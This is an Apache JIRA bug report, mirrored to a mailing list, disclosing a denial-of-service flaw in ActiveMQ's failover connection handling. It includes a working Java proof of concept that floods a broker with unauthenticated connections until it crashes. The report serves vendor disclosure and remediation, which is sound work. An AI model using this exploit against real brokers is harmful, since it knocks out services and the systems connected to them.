[jira] [Created] (AMQ-3294) ActiveMQ failover Denial of Service

Luca Carettoni (JIRA) Fri, 22 Apr 2011 11:45:45 -0700

ActiveMQ failover Denial of Service
-----------------------------------

                 Key: AMQ-3294
                 URL: https://issues.apache.org/jira/browse/AMQ-3294
             Project: ActiveMQ
          Issue Type: Bug
          Components: Broker
    Affects Versions: 5.5.0, 5.2.0
         Environment: Linux ubuntu 2.6.32-30-generic and other Linux versions


            Reporter: Luca Carettoni


Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can trigger 
a Denial of Service condition against the broker service. 

In detail, an attacker can issue multiple ActiveMQ openwire connection requests 
using the following connection string:  failover:tcp://<IP>:61616

Due to the 'failure' mechanism, all TCP connections remain active even if a 
valid session is not created. 
Please note that no valid credentials have been used. 

After a few thousand requests, a "java.net.SocketException: Too many open 
files" exception is triggered causing the freeze/crash of the broker. Connected 
systems may crash as well. 

During my test, the attack took around 4 minutes (in a local network) and it is 
highly reliable. This is most likely an abuse of the 'failover' functionality.

I've been testing version 5.2.0 and also the latest 5.5.0 release. As both 
releases are affected, I assume that this issue is present in other versions as 
well. The problem appears in the default configuration as well as with 
different authentication plugins enabled.

Proof-Of-Concept:

--------------------
package openwireclient;

import javax.jms.*;
import org.apache.activemq.ActiveMQConnectionFactory;

public class GoAndCrash {

    private static String url = "failover:tcp://";

    public static void main(String[] args) throws JMSException {

        System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");

        url = url.concat(args[0] + ":" + args[1]);
        int cont = 0;

        while (true) {
            try {
                System.out.println("[*] Request #" + cont);
                ConnectionFactory connectionFactory = new 
ActiveMQConnectionFactory("invalidUser", "invalidPass", url);
                Connection connection = connectionFactory.createConnection();
                cont++;
                connection.start();
            } catch (Exception ex) {
               //do nothing
            }
        }
    }
}
--------------------


--
This message is automatically generated by JIRA.
For more information on JIRA, see: http://www.atlassian.com/software/jira

[jira] [Created] (AMQ-3294) ActiveMQ failover Denial of Service

Reply via email to